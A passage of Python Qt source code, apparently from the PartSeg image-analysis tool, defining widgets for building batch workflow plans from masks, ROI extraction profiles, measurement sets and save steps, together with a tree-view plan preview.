layout.addWidget(self.mask2_name, 1, 1)\n layout.addWidget(self.cancel_btn, 2, 0)\n layout.addWidget(self.ok_btn, 2, 1)\n self.setLayout(layout)\n\n def text_changed(self):\n text1, text2 = self.get_result()\n if \"\" in {text1, text2} or text1 not in self.mask_names or text2 not in self.mask_names:\n self.ok_btn.setDisabled(True)\n else:\n self.ok_btn.setDisabled(text1 == text2)\n\n def get_result(self):\n text1 = str(self.mask1_name.text()).strip()\n text2 = str(self.mask2_name.text()).strip()\n return text1, text2\n\n\nclass FileMaskType(Enum):\n \"\"\"\n Enum for file mask types\n \"\"\"\n\n Suffix = 0\n Replace = 1\n Mapping_file = 2\n\n\nclass FileMask(QWidget):\n value_changed = Signal()\n\n def __init__(self):\n super().__init__()\n self.select_type = QEnumComboBox(enum_class=FileMaskType)\n self.values = [\"_mask\", (\"\", \"\"), \"\"]\n self.first_text = QLineEdit(self.values[0])\n self.second_text = QLineEdit()\n self.first_label = QLabel(\"Use suffix:\")\n self.second_label = QLabel(\"Replace:\")\n self.select_file_btn = QPushButton(\"Select file\")\n self.state = FileMaskType.Suffix\n\n layout = QGridLayout()\n layout.addWidget(self.select_type, 0, 0, 1, 2)\n layout.addWidget(self.first_label, 1, 0)\n layout.addWidget(self.second_label, 1, 1)\n layout.addWidget(self.first_text, 2, 0)\n layout.addWidget(self.second_text, 2, 1)\n layout.addWidget(self.select_file_btn, 3, 0, 1, 2)\n layout.setColumnStretch(0, 1)\n layout.setRowStretch(4, 1)\n self.setLayout(layout)\n\n self.second_text.setHidden(True)\n self.second_label.setHidden(True)\n self.select_file_btn.setHidden(True)\n\n self.first_text.textChanged.connect(self._value_change_wrap)\n self.second_text.textChanged.connect(self._value_change_wrap)\n self.select_type.currentIndexChanged.connect(self._value_change_wrap)\n self.select_type.currentEnumChanged.connect(self.change_type)\n self.select_file_btn.clicked.connect(self.select_file)\n\n def _value_change_wrap(self, _val=None):\n \"\"\"Pyside bug workaround\"\"\"\n self.value_changed.emit()\n\n def change_type(self, index: FileMaskType):\n if self.state == index:\n return\n if self.state == FileMaskType.Replace:\n self.values[1] = self.first_text.text(), self.second_text.text()\n else:\n self.values[self.state.value] = self.first_text.text()\n if index == FileMaskType.Replace:\n self.second_text.setHidden(False)\n self.second_label.setHidden(False)\n self.layout().setColumnStretch(1, 1)\n self.first_text.setText(self.values[1][0])\n self.second_text.setText(self.values[1][1])\n self.first_label.setText(\"Base\")\n self.select_file_btn.setHidden(True)\n else:\n self.second_text.setHidden(True)\n self.second_label.setHidden(True)\n self.layout().setColumnStretch(1, 0)\n self.first_label.setText([\"Use suffix:\", \"\", \"Path:\"][index.value])\n self.first_text.setText(self.values[index.value])\n self.select_file_btn.setHidden(index == 0)\n self.state = index\n\n def select_file(self):\n dial = QFileDialog()\n dial.setFileMode(QFileDialog.ExistingFile)\n dial.setAcceptMode(QFileDialog.AcceptOpen)\n\n if dial.exec_():\n self.first_text.setText(dial.selectedFiles()[0])\n\n def is_valid(self) -> bool:\n if self.select_type.currentEnum() == FileMaskType.Suffix:\n return bool(self.first_text.text().strip())\n if self.select_type.currentEnum() == FileMaskType.Replace:\n return \"\" not in {self.first_text.text().strip(), self.second_text.text().strip()}\n\n text = self.first_text.text().strip()\n return text and os.path.exists(text) and os.path.isfile(text)\n\n def get_value(self, name=\"\"):\n mask_type = self.select_type.currentEnum()\n if mask_type == FileMaskType.Suffix:\n return MaskSuffix(name=name, suffix=self.first_text.text().strip())\n if mask_type == FileMaskType.Replace:\n return MaskSub(name=name, base=self.first_text.text().strip(), rep=self.second_text.text().strip())\n return MaskFile(name=name, path_to_file=self.first_text.text().strip())\n\n\nclass MaskOperation(Enum):\n mask_intersection = 0\n mask_sum = 1\n\n def __str__(self):\n return self.name.replace(\"_\", \" \").capitalize()\n\n\nclass ProtectedGroupBox(QGroupBox):\n def __init__(self, text: str, parent: typing.Optional[QWidget] = None):\n super().__init__(text, parent)\n self.setStyleSheet(group_sheet)\n self.protect = False\n self._node_type = None\n self._parent_node_type = None\n self._replace = False\n\n def set_current_node(self, node: typing.Optional[NodeType], parent_node: typing.Optional[NodeType] = None):\n self._node_type = node\n self._parent_node_type = parent_node\n self._activate_button()\n\n def set_replace(self, replace: bool):\n self._replace = replace\n self._activate_button()\n\n def _activate_button(self, _value=None):\n raise NotImplementedError\n\n @contextmanager\n def enable_protect(self):\n previous = self.protect\n self.protect = True\n try:\n yield\n finally:\n self.protect = previous\n\n @classmethod\n def refresh_profiles(\n cls, list_widget: typing.Union[QListWidget, SearchableListWidget], new_values: typing.List[str]\n ):\n index = cls.get_index(list_widget.currentItem(), new_values)\n list_widget.clear()\n list_widget.addItems(new_values)\n if index != -1:\n list_widget.setCurrentRow(index)\n\n @staticmethod\n def get_index(item: QListWidgetItem, new_values: typing.List[str]) -> int:\n if item is None:\n return -1\n text = item.text()\n try:\n return new_values.index(text)\n except ValueError: # pragma: no cover\n return -1\n\n\nclass OtherOperations(ProtectedGroupBox):\n save_operation = Signal(object)\n\n def __init__(self, parent=None):\n super().__init__(\"Other operations:\", parent)\n self.save_translate_dict: typing.Dict[str, SaveBase] = {x.get_short_name(): x for x in save_dict.values()}\n self.save_constructor = None\n\n self.change_root = QEnumComboBox(self, enum_class=RootType)\n self.choose_save_method = QComboBox()\n self.choose_save_method.addItem(\"\")\n self.choose_save_method.addItems(list(self.save_translate_dict.keys()))\n self.save_btn = QPushButton(\"Save\")\n\n self.choose_save_method.currentTextChanged.connect(self.save_changed)\n self.save_btn.clicked.connect(self.save_action)\n\n layout = QVBoxLayout()\n layout.setSpacing(0)\n layout.addWidget(QLabel(\"Root type:\"))\n layout.addWidget(self.change_root)\n layout.addStretch(1)\n layout.addWidget(QLabel(\"Saving:\"))\n layout.addWidget(self.choose_save_method)\n layout.addWidget(self.save_btn)\n\n self.setLayout(layout)\n\n @property\n def root_type_changed(self):\n return self.change_root.currentEnumChanged\n\n def save_changed(self, text):\n text = str(text)\n save_class = self.save_translate_dict.get(text, None)\n if save_class is None:\n self.choose_save_method.setCurrentText(\"\")\n self.save_btn.setText(\"Save\")\n self.save_btn.setToolTip(\"Choose file type\")\n else:\n self.save_btn.setText(f\"Save to {save_class.get_short_name()}\")\n self.save_btn.setToolTip(\"Choose mask create in plan view\")\n self._activate_button()\n\n @property\n def expected_node_type(self) -> typing.Optional[NodeType]:\n save_class = self.save_translate_dict.get(self.choose_save_method.currentText(), None)\n if save_class is None:\n return None\n if save_class.need_mask():\n return NodeType.mask\n return NodeType.segment if save_class.need_segmentation() else NodeType.root\n\n def _activate_button(self, _value=None):\n if self._replace:\n self.save_btn.setEnabled(self._parent_node_type == self.expected_node_type and self._node_type is not None)\n else:\n self.save_btn.setEnabled(self._node_type == self.expected_node_type and self._node_type is not None)\n\n def save_action(self):\n save_class = self.save_translate_dict.get(self.choose_save_method.currentText(), None)\n if save_class is None: # pragma: no cover\n show_warning(self, \"Save problem\", \"Not found save class\")\n return\n dial = FormDialog(\n [\n AlgorithmProperty(\"suffix\", \"File suffix\", \"\"),\n AlgorithmProperty(\"directory\", \"Sub directory\", \"\"),\n *save_class.get_fields(),\n ]\n )\n if not dial.exec_():\n return\n values = dial.get_values()\n suffix = values[\"suffix\"]\n directory = values[\"directory\"]\n del values[\"suffix\"]\n del values[\"directory\"]\n save_elem = Save(\n suffix=suffix,\n directory=directory,\n algorithm=save_class.get_name(),\n short_name=save_class.get_short_name(),\n values=values,\n )\n self.save_operation.emit(save_elem)\n\n\nclass ROIExtractionOp(ProtectedGroupBox):\n roi_extraction_profile_selected = Signal(object)\n roi_extraction_pipeline_selected = Signal(object)\n roi_extraction_profile_add = Signal(object)\n roi_extraction_pipeline_add = Signal(object)\n\n def __init__(self, settings: PartSettings, parent: typing.Optional[QWidget] = None):\n super().__init__(\"ROI extraction\", parent)\n self.settings = settings\n\n self.roi_profile = SearchableListWidget()\n self.roi_pipeline = SearchableListWidget()\n self.roi_extraction_tab = QTabWidget()\n self.roi_extraction_tab.addTab(self.roi_profile, \"Profile\")\n self.roi_extraction_tab.addTab(self.roi_pipeline, \"Pipeline\")\n\n self.choose_profile_btn = QPushButton(\"Add Profile\")\n self.choose_profile_btn.setDisabled(True)\n\n self.settings.roi_profiles_changed.connect(self._refresh_profiles)\n self.settings.roi_pipelines_changed.connect(self._refresh_pipelines)\n\n self.roi_profile.currentTextChanged.connect(self._roi_extraction_profile_selected)\n self.roi_pipeline.currentTextChanged.connect(self._roi_extraction_pipeline_selected)\n self.choose_profile_btn.clicked.connect(self._add_profile)\n self.roi_extraction_tab.currentChanged.connect(self._on_change_tab)\n\n layout = QVBoxLayout()\n layout.setSpacing(0)\n layout.addWidget(self.roi_extraction_tab)\n layout.addWidget(self.choose_profile_btn)\n\n self.setLayout(layout)\n\n self._refresh_profiles()\n self._refresh_pipelines()\n self._update_btn_text()\n self.settings.roi_profiles_changed.connect(self._refresh_profiles)\n self.settings.roi_pipelines_changed.connect(self._refresh_pipelines)\n\n def set_replace(self, replace: bool):\n super().set_replace(replace)\n self._on_change_tab()\n\n def _activate_button(self, _value=None):\n if self._replace:\n self.choose_profile_btn.setEnabled(\n self._node_type == NodeType.segment\n and self.roi_extraction_tab.currentWidget() == self.roi_profile\n and self.roi_profile.currentItem() is not None\n )\n return\n self.choose_profile_btn.setEnabled(\n self._node_type in {NodeType.root, NodeType.mask, NodeType.file_mask}\n and self.roi_extraction_tab.currentWidget().currentRow() >= 0\n )\n\n def _update_btn_text(self):\n index = self.roi_extraction_tab.currentIndex()\n text = self.roi_extraction_tab.tabText(index)\n if self._replace:\n self.choose_profile_btn.setText(f\"Replace {text}\")\n else:\n self.choose_profile_btn.setText(f\"Add {text}\")\n\n def _on_change_tab(self, _val=None):\n self._update_btn_text()\n with self.enable_protect():\n self.roi_profile.setCurrentItem(None)\n self.roi_pipeline.setCurrentItem(None)\n self._activate_button()\n\n def _refresh_profiles(self):\n new_profiles = sorted(self.settings.roi_profiles.keys(), key=str.lower)\n with self.enable_protect():\n self.refresh_profiles(self.roi_profile, new_profiles)\n\n def _refresh_pipelines(self):\n new_pipelines = sorted(self.settings.roi_pipelines.keys(), key=str.lower)\n with self.enable_protect():\n self.refresh_profiles(self.roi_pipeline, new_pipelines)\n\n def _roi_extraction_profile_selected(self, name: str):\n if self.protect:\n return\n self._activate_button()\n self.roi_extraction_profile_selected.emit(self.settings.roi_profiles[name])\n\n def _roi_extraction_pipeline_selected(self, name: str):\n if self.protect:\n return\n self._activate_button()\n self.roi_extraction_pipeline_selected.emit(self.settings.roi_pipelines[name])\n\n def _add_profile(self):\n if self.roi_extraction_tab.currentWidget() == self.roi_profile:\n item = self.roi_profile.currentItem()\n if item is None:\n return\n self.roi_extraction_profile_add.emit(deepcopy(self.settings.roi_profiles[item.text()]))\n else:\n item = self.roi_pipeline.currentItem()\n if item is None:\n return\n self.roi_extraction_pipeline_add.emit(deepcopy(self.settings.roi_pipelines[item.text()]))\n\n\nclass SelectMeasurementOp(ProtectedGroupBox):\n set_of_measurement_add = Signal(object)\n set_of_measurement_selected = Signal(object)\n\n def __init__(self, settings: PartSettings, parent: typing.Optional[QWidget] = None):\n super().__init__(\"Set of measurements:\", parent)\n self.settings = settings\n\n self.measurements_list = SearchableListWidget(self)\n self.measurement_name_prefix = QLineEdit(self)\n self.choose_channel_for_measurements = QComboBox()\n self.choose_channel_for_measurements.addItems(\n [\"Same as segmentation\"] + [str(x + 1) for x in range(MAX_CHANNEL_NUM)]\n )\n self.units_choose = QEnumComboBox(enum_class=Units)\n self.units_choose.setCurrentEnum(self.settings.get(\"units_value\", Units.nm))\n self.add_measurement_btn = QPushButton(\"Add measurement calculation\")\n self.add_measurement_btn.clicked.connect(self._measurement_add)\n self.measurements_list.currentTextChanged.connect(self._measurement_selected)\n\n layout = QGridLayout()\n layout.setSpacing(0)\n layout.addWidget(self.measurements_list, 0, 0, 1, 2)\n lab = QLabel(\"Name prefix:\")\n lab.setToolTip(\"Prefix added before each column name\")\n layout.addWidget(lab, 1, 0)\n layout.addWidget(self.measurement_name_prefix, 1, 1)\n layout.addWidget(QLabel(\"Channel:\"), 2, 0)\n layout.addWidget(self.choose_channel_for_measurements, 2, 1)\n layout.addWidget(QLabel(\"Units:\"), 3, 0)\n layout.addWidget(self.units_choose, 3, 1)\n layout.addWidget(self.add_measurement_btn, 4, 0, 1, 2)\n self.setLayout(layout)\n\n self.add_measurement_btn.setDisabled(True)\n self._refresh_measurement()\n self.settings.measurement_profiles_changed.connect(self._refresh_measurement)\n\n def set_replace(self, replace: bool):\n super().set_replace(replace)\n self.add_measurement_btn.setText(\"Replace set of measurements\" if self._replace else \"Add set of measurements\")\n\n def _activate_button(self, _value=None):\n if self._replace:\n self.add_measurement_btn.setEnabled(\n self._node_type == NodeType.measurement and self.measurements_list.currentItem() is not None\n )\n else:\n self.add_measurement_btn.setEnabled(\n self._node_type == NodeType.segment and self.measurements_list.currentItem() is not None\n )\n\n def _refresh_measurement(self):\n new_measurements = sorted(self.settings.measurement_profiles.keys(), key=str.lower)\n with self.enable_protect():\n self.refresh_profiles(self.measurements_list, new_measurements)\n\n def _measurement_add(self):\n item = self.measurements_list.currentItem()\n if item is None:\n return\n measurement_copy = deepcopy(self.settings.measurement_profiles[item.text()])\n prefix = str(self.measurement_name_prefix.text()).strip()\n channel = self.choose_channel_for_measurements.currentIndex() - 1\n measurement_copy.name_prefix = prefix\n self.set_of_measurement_add.emit(\n MeasurementCalculate(\n channel=channel,\n measurement_profile=measurement_copy,\n name_prefix=prefix,\n units=self.units_choose.currentEnum(),\n )\n )\n\n def _measurement_selected(self, name: str):\n if self.protect:\n return\n self._activate_button()\n self.set_of_measurement_selected.emit(self.settings.measurement_profiles[name])\n\n\nclass StretchWrap(QWidget):\n def __init__(self, widget: QWidget, parent: typing.Optional[QWidget] = None):\n super().__init__(parent)\n self.widget = widget\n lay = QVBoxLayout()\n lay.setSpacing(0)\n lay.addWidget(widget)\n lay.addStretch(1)\n self.setLayout(lay)\n\n def __getattr__(self, item):\n return getattr(self.widget, item)\n\n\nclass SelectMaskOp(ProtectedGroupBox):\n mask_step_add = Signal(object)\n\n def __init__(self, settings: PartSettings, parent: typing.Optional[QWidget] = None):\n super().__init__(\"Use mask from:\", parent)\n self.settings = settings\n self.mask_set = {}\n\n self.file_mask = FileMask()\n self.mask_from_segmentation = MaskWidget(settings)\n self.mask_operation = StretchWrap(QEnumComboBox(enum_class=MaskOperation))\n self.add_mask_btn = QPushButton(\"Add mask\")\n self.add_mask_btn.setToolTip(\"Mask need to have unique name\")\n self.add_mask_btn.clicked.connect(self._add_mask)\n self.mask_name = QLineEdit()\n\n self.mask_tab_select = QTabWidget()\n\n self.mask_tab_select.addTab(self.file_mask, \"File\")\n self.mask_tab_select.addTab(self.mask_from_segmentation, \"Current ROI\")\n self.mask_tab_select.addTab(self.mask_operation, \"Operations on masks\")\n self.mask_tab_select.setTabToolTip(2, \"Allows to create mask which is based on masks previously added to plan.\")\n self.mask_tab_select.currentChanged.connect(self._activate_button)\n self.mask_name.textChanged.connect(self._activate_button)\n\n layout = QGridLayout()\n layout.setSpacing(0)\n layout.addWidget(self.mask_tab_select, 0, 0, 1, 2)\n label = QLabel(\"Mask name:\")\n label.setToolTip(\"Needed if you would like to reuse this mask in tab 'Operations on masks'\")\n self.mask_name.setToolTip(\"Needed if you would like to reuse this mask in tab 'Operations on masks'\")\n layout.addWidget(label, 1, 0)\n layout.addWidget(self.mask_name, 1, 1)\n layout.addWidget(self.add_mask_btn, 2, 0, 1, 2)\n self.setLayout(layout)\n\n self.add_mask_btn.setDisabled(True)\n\n def update_mask_set(self, mask_set: typing.Set[str]):\n self.mask_set = mask_set\n\n def set_replace(self, replace: bool):\n super().set_replace(replace)\n self.add_mask_btn.setText(\"Replace mask\" if self._replace else \"Add mask\")\n\n def _activate_button(self, _value=None):\n name = self.mask_name.text().strip()\n name_ok = not name or name not in self.mask_set\n if self._replace:\n name_ok = name_ok and self._node_type == NodeType.mask\n node_type = self._parent_node_type\n else:\n node_type = self._node_type\n if self.mask_tab_select.currentWidget() == self.mask_from_segmentation:\n self.add_mask_btn.setEnabled(node_type == NodeType.segment and name_ok)\n return\n self.add_mask_btn.setEnabled(node_type == NodeType.root and name_ok)\n\n def _add_mask(self):\n widget = self.mask_tab_select.currentWidget()\n name = self.mask_name.text().strip()\n if widget == self.file_mask:\n mask_ob = self.file_mask.get_value(name)\n elif widget == self.mask_from_segmentation:\n mask_ob = MaskCreate(name=name, mask_property=self.mask_from_segmentation.get_mask_property())\n elif widget == self.mask_operation:\n dial = TwoMaskDialog(self.mask_set)\n if not dial.exec_():\n return # pragma: no cover\n names = dial.get_result()\n\n if self.mask_operation.currentEnum() == MaskOperation.mask_intersection: # Mask intersection\n mask_construct = MaskIntersection\n else:\n mask_construct = MaskSum\n mask_ob = mask_construct(name=name, mask1=names[0], mask2=names[1])\n else:\n raise ValueError(\"Unknown widget\") # pragma: no cover\n\n self.mask_step_add.emit(mask_ob)\n\n\nclass CreatePlan(QWidget):\n plan_node_changed = Signal()\n\n def __init__(self, settings: PartSettings):\n super().__init__()\n self.settings = settings\n self.save_translate_dict: typing.Dict[str, SaveBase] = {x.get_short_name(): x for x in save_dict.values()}\n self._mask_set = set()\n self.plan = PlanPreview(self)\n self.save_plan_btn = QPushButton(\"Save\")\n self.clean_plan_btn = QPushButton(\"Remove all\")\n self.remove_btn = QPushButton(\"Remove\")\n self.update_element_chk = QCheckBox(\"Update element\")\n self.other_operations = OtherOperations(self)\n self.roi_extraction = ROIExtractionOp(settings=settings, parent=self)\n self.select_measurement = SelectMeasurementOp(settings=settings, parent=self)\n self.select_mask = SelectMaskOp(settings=settings, parent=self)\n self.mask_set = set()\n\n self.expected_node_type = None\n self.save_constructor = None\n\n self.information = QTextEdit()\n self.information.setReadOnly(True)\n\n # FIXME: fix in better way\n self.calculation_plan = CalculationPlan()\n self.plan.set_plan(self.calculation_plan)\n self.segmentation_mask = MaskWidget(settings)\n self.file_mask = FileMask()\n\n self.other_operations.root_type_changed.connect(self.change_root_type)\n self.other_operations.save_operation.connect(self.add_save_operation)\n self.roi_extraction.roi_extraction_pipeline_selected.connect(self.show_info)\n self.roi_extraction.roi_extraction_profile_selected.connect(self.show_info)\n self.roi_extraction.roi_extraction_profile_add.connect(self.add_roi_extraction)\n self.roi_extraction.roi_extraction_pipeline_add.connect(self.add_roi_extraction_pipeline)\n self.select_measurement.set_of_measurement_add.connect(self.add_set_of_measurement)\n self.select_measurement.set_of_measurement_selected.connect(self.show_info)\n self.select_mask.mask_step_add.connect(self.create_mask)\n\n self.clean_plan_btn.clicked.connect(self.clean_plan)\n self.remove_btn.clicked.connect(self.remove_element)\n self.save_plan_btn.clicked.connect(self.add_calculation_plan)\n self.update_element_chk.stateChanged.connect(self.select_mask.set_replace)\n self.update_element_chk.stateChanged.connect(self.roi_extraction.set_replace)\n self.update_element_chk.stateChanged.connect(self.select_measurement.set_replace)\n\n self.setup_ui()\n\n self.node_type = NodeType.root\n self.node_name = \"\"\n self.plan.changed_node.connect(self.node_type_changed)\n self.node_type_changed()\n\n def setup_ui(self):\n plan_box = QGroupBox(\"Prepare workflow:\")\n lay = QVBoxLayout()\n lay.addWidget(self.plan)\n bt_lay = QGridLayout()\n bt_lay.setSpacing(1)\n bt_lay.addWidget(self.save_plan_btn, 0, 0)\n bt_lay.addWidget(self.clean_plan_btn, 0, 1)\n bt_lay.addWidget(self.remove_btn, 1, 0)\n bt_lay.addWidget(self.update_element_chk, 1, 1)\n lay.addLayout(bt_lay)\n plan_box.setLayout(lay)\n plan_box.setStyleSheet(group_sheet)\n\n info_box = QGroupBox(\"Information\")\n info_box.setStyleSheet(group_sheet)\n lay = QVBoxLayout()\n lay.addWidget(self.information)\n info_box.setLayout(lay)\n\n layout = QGridLayout()\n layout.addWidget(plan_box, 0, 0, 5, 1)\n layout.addWidget(self.select_mask, 0, 2, 1, 2)\n layout.addWidget(self.other_operations, 0, 1)\n layout.addWidget(self.roi_extraction, 1, 1, 1, 2)\n layout.addWidget(self.select_measurement, 1, 3)\n layout.addWidget(info_box, 3, 1, 1, 3)\n self.setLayout(layout)\n\n @property\n def mask_set(self):\n return self._mask_set\n\n @mask_set.setter\n def mask_set(self, value):\n self._mask_set = value\n self.select_mask.update_mask_set(value)\n\n def change_root_type(self, root_type: RootType):\n self.calculation_plan.set_root_type(root_type)\n self.plan.update_view()\n\n def add_save_operation(self, save_info: Save):\n if self.update_element_chk.isChecked():\n self.calculation_plan.replace_step(save_info)\n else:\n self.calculation_plan.add_step(save_info)\n self.plan.update_view()\n\n def add_set_of_measurement(self, set_of_measurement: MeasurementCalculate):\n if self.update_element_chk.isChecked():\n self.calculation_plan.replace_step(set_of_measurement)\n else:\n self.calculation_plan.add_step(set_of_measurement)\n self.plan.update_view()\n\n def node_type_changed(self):\n self.node_name = \"\"\n if self.plan.currentItem() is None:\n self.remove_btn.setDisabled(True)\n self.plan_node_changed.emit()\n logging.debug(\"[node_type_changed] return\")\n return\n node_type = self.calculation_plan.get_node_type()\n\n node_type_for_ob = self.calculation_plan.get_node_type(parent=self.update_element_chk.isChecked())\n\n self.other_operations.set_current_node(node_type, node_type_for_ob)\n self.roi_extraction.set_current_node(node_type, node_type_for_ob)\n self.select_measurement.set_current_node(node_type, node_type_for_ob)\n self.select_mask.set_current_node(node_type, node_type_for_ob)\n\n self.node_type = node_type\n self.plan_node_changed.emit()\n\n def create_mask(self, mask_ob: MaskBase):\n if mask_ob.name and mask_ob.name in self.mask_set:\n show_warning(\"Already exists\", \"Mask with this name already exists\")\n return\n\n if self.update_element_chk.isChecked():\n node = self.calculation_plan.get_node()\n name = node.operation.name\n if name in self.calculation_plan.get_reused_mask() and name != mask_ob.name:\n show_warning(\n \"Cannot remove\", f\"Cannot remove mask '{name}' from plan because it is used in other elements\"\n )\n return\n\n self.mask_set.remove(name)\n self.mask_set.add(mask_ob.name)\n self.calculation_plan.replace_step(mask_ob)\n else:\n self.mask_set.add(mask_ob.name)\n self.calculation_plan.add_step(mask_ob)\n self.plan.update_view()\n\n def add_roi_extraction(self, roi_extraction: ROIExtractionOp):\n if self.update_element_chk.isChecked():\n self.calculation_plan.replace_step(roi_extraction)\n else:\n self.calculation_plan.add_step(roi_extraction)\n self.plan.update_view()\n\n def add_roi_extraction_pipeline(self, roi_extraction_pipeline: SegmentationPipeline):\n if self.update_element_chk.isChecked():\n show_warning(\"Cannot update pipeline\", \"Cannot update pipeline\")\n return\n pos = self.calculation_plan.current_pos[:]\n old_pos = pos[:]\n for el in roi_extraction_pipeline.mask_history:\n self.calculation_plan.add_step(el.segmentation)\n self.plan.update_view()\n node = self.calculation_plan.get_node(pos)\n pos.append(len(node.children) - 1)\n self.calculation_plan.set_position(pos)\n self.calculation_plan.add_step(MaskCreate(name=\"\", mask_property=el.mask_property))\n self.plan.update_view()\n pos.append(0)\n self.calculation_plan.set_position(pos)\n self.calculation_plan.add_step(roi_extraction_pipeline.segmentation)\n self.calculation_plan.set_position(old_pos)\n self.plan.update_view()\n\n def remove_element(self):\n conflict_mask, used_mask = self.calculation_plan.get_file_mask_names()\n if len(conflict_mask) > 0:\n logging.info(\"Mask in use\")\n show_warning(\"In use\", f'Masks {\", \".join(conflict_mask)} are used in other places')\n\n return\n self.mask_set -= used_mask\n self.calculation_plan.remove_step()\n self.plan.update_view()\n\n def clean_plan(self):\n self.calculation_plan = CalculationPlan()\n self.plan.set_plan(self.calculation_plan)\n self.node_type_changed()\n self.mask_set = set()\n\n def add_calculation_plan(self, text=None):\n if text is None or isinstance(text, bool):\n text, ok = QInputDialog.getText(self, \"Plan title\", \"Set plan title\")\n else:\n text, ok = QInputDialog.getText(\n self, \"Plan title\", f\"Set plan title. Previous ({text}) is already in use\", text=text\n )\n text = text.strip()\n if ok:\n if not text:\n QMessageBox.information(\n self, \"Name cannot be empty\", \"Name cannot be empty, Please set correct name\", QMessageBox.Ok\n )\n self.add_calculation_plan()\n return\n if text in self.settings.batch_plans:\n res = QMessageBox.information(\n self,\n \"Name already in use\",\n \"Name already in use. Would like to overwrite?\",\n QMessageBox.Yes | QMessageBox.No,\n )\n if res == QMessageBox.No:\n self.add_calculation_plan(text)\n return\n plan = copy(self.calculation_plan)\n plan.set_name(text)\n self.settings.batch_plans[text] = plan\n self.settings.dump()\n\n def show_info(self, item: typing.Union[ROIExtractionOp, SegmentationPipeline, MeasurementProfile]):\n if isinstance(item, (ROIExtractionOp, MeasurementProfile)):\n self.information.setText(str(item))\n else:\n self.information.setText(item.pretty_print(AnalysisAlgorithmSelection))\n\n def edit_plan(self):\n plan = self.sender().plan_to_edit # type: CalculationPlan\n self.calculation_plan = copy(plan)\n self.plan.set_plan(self.calculation_plan)\n self.mask_set.clear()\n self.calculation_plan.set_position([])\n self.mask_set.update(self.calculation_plan.get_mask_names())\n\n\nclass PlanPreview(QTreeWidget):\n \"\"\"\n :type calculation_plan: CalculationPlan\n \"\"\"\n\n changed_node = Signal()\n\n def __init__(self, parent=None, calculation_plan=None):\n super().__init__(parent)\n self.calculation_plan = calculation_plan\n self.header().close()\n self.itemSelectionChanged.connect(self.set_path)\n self.setContextMenuPolicy(Qt.CustomContextMenu)\n\n def restore_path(self, widget, path):\n \"\"\"\n :type widget: QTreeWidgetItem\n :type path: list[int]\n :param widget:\n :param path:\n :return:\n \"\"\"\n if widget is None:\n return list(reversed(path))\n parent = widget.parent()\n if parent is None:\n return list(reversed(path))\n index = parent.indexOfChild(widget)\n if str(parent.child(0).text(0)) == \"Description\":\n index -= 1\n if index == -1:\n return None\n path.append(index)\n return self.restore_path(parent, path)\n\n def set_path(self):\n current_item = self.currentItem() # type : QTreeWidgetItem\n if current_item is None:\n return\n self.calculation_plan.set_position(self.restore_path(current_item, []))\n self.changed_node.emit()\n\n def preview_object(self, calculation_plan):\n self.set_plan(calculation_plan)\n\n def set_plan(self, calculation_plan):\n self.calculation_plan = calculation_plan\n self.setCurrentItem(self.topLevelItem(0))\n self.update_view(True)\n\n def explore_tree(self, up_widget, node_plan, deep=True):\n \"\"\"\n :type up_widget: QTreeWidgetItem\n :type node_plan: CalculationTree\n :type deep: bool\n :param up_widget: List widget item\n :param node_plan: node from calculation plan\n :return:\n \"\"\"\n widget = QTreeWidgetItem(up_widget)\n widget.setText(0, CalculationPlan.get_el_name(node_plan.operation))\n self.setCurrentItem(widget)\n if isinstance(node_plan.operation, (MeasurementCalculate, ROIExtractionProfile)):\n widget.setData(0, Qt.UserRole, node_plan.operation)\n if isinstance(node_plan.operation, (MeasurementCalculate, ROIExtractionProfile, MaskCreate)):\n desc = QTreeWidgetItem(widget)\n desc.setText(0, \"Description\")\n if isinstance(node_plan.operation, ROIExtractionProfile):\n txt = node_plan.operation.pretty_print(AnalysisAlgorithmSelection)\n else:\n txt = str(node_plan.operation)\n for line in txt.split(\"\\n\")[1:]:\n QTreeWidgetItem(desc, [line])\n if deep:\n for el in node_plan.children:\n self.explore_tree(widget, el)\n up_widget.setExpanded(True)\n\n def get_node(self, path):\n \"\"\"\n :type path: list[int]\n :param path:\n :return: QTreeWidgetItem\n \"\"\"\n widget = self.topLevelItem(0) # type : QTreeWidgetItem\n for index in path:\n if str(widget.child(0).text(0)) == \"Description\":\n widget = widget.child(index + 1)\n else:\n widget = widget.child(index)\n return widget\n\n def update_view(self, reset=False):\n if reset:\n self.clear()\n root = QTreeWidgetItem(self)\n root.setText(0, f\"Root {self.calculation_plan.get_root_type()}\")\n self.setCurrentItem(root)\n for el in self.calculation_plan.execution_tree.children:\n self.explore_tree(root, el, True)\n return\n self.blockSignals(True)\n root = self.get_node([])\n root.setText(0, f\"Root {self.calculation_plan.get_root_type()}\")\n for path, el, op_type in self.calculation_plan.get_changes():\n if op_type == PlanChanges.add_node:\n node = self.get_node(path)\n self.explore_tree(node, el, False)\n elif op_type == PlanChanges.remove_node:\n node = self.get_node(path[:-1])\n index = path[-1]\n if str(node.child(0).text(0)) == \"Description\":\n index += 1\n node.removeChild(node.child(index))\n elif op_type == PlanChanges.replace_node:\n node = self.get_node(path)\n node.setText(0, CalculationPlan.get_el_name(el.operation))\n if isinstance(el.operation, (MeasurementCalculate, ROIExtractionProfile, MaskCreate)):\n child = node.child(0)\n child.takeChildren()\n if isinstance(el.operation, ROIExtractionProfile):\n txt = el.operation.pretty_print(AnalysisAlgorithmSelection)\n else:\n txt = str(el.operation)\n for line in txt.split(\"\\n\")[1:]:\n QTreeWidgetItem(child, [line])\n\n else:\n logging.error(\"Unknown operation %s\", op_type) # pragma: no cover\n self.blockSignals(False)\n self.set_path()\n self.changed_node.emit()\n\n\nclass CalculateInfo(QWidget):\n \"\"\"\n \"widget to show information about plans and allow to se plan details\n :type settings: Settings\n \"\"\"\n\n plan_to_edit_signal = Signal()\n\n def __init__(self, settings: PartSettings):\n super().__init__()\n self.settings = settings\n self.calculate_plans = SearchableListWidget(self)\n self.plan_view = PlanPreview(self)\n self.delete_plan_btn = QPushButton(\"Delete\")\n self.edit_plan_btn = QPushButton(\"Edit\")\n self.export_plans_btn = QPushButton(\"Export\")\n self.import_plans_btn = QPushButton(\"Import\")\n info_layout = QVBoxLayout()\n info_butt_layout = QGridLayout()\n info_butt_layout.setSpacing(1)\n info_butt_layout.addWidget(self.delete_plan_btn, 1, 1)\n info_butt_layout.addWidget(self.edit_plan_btn, 0, 1)\n info_butt_layout.addWidget(self.export_plans_btn, 1, 0)\n info_butt_layout.addWidget(self.import_plans_btn, 0, 0)\n info_layout.addLayout(info_butt_layout)\n info_chose_layout = QVBoxLayout()\n info_chose_layout.setSpacing(2)\n info_chose_layout.addWidget(QLabel(\"List of workflows:\"))\n 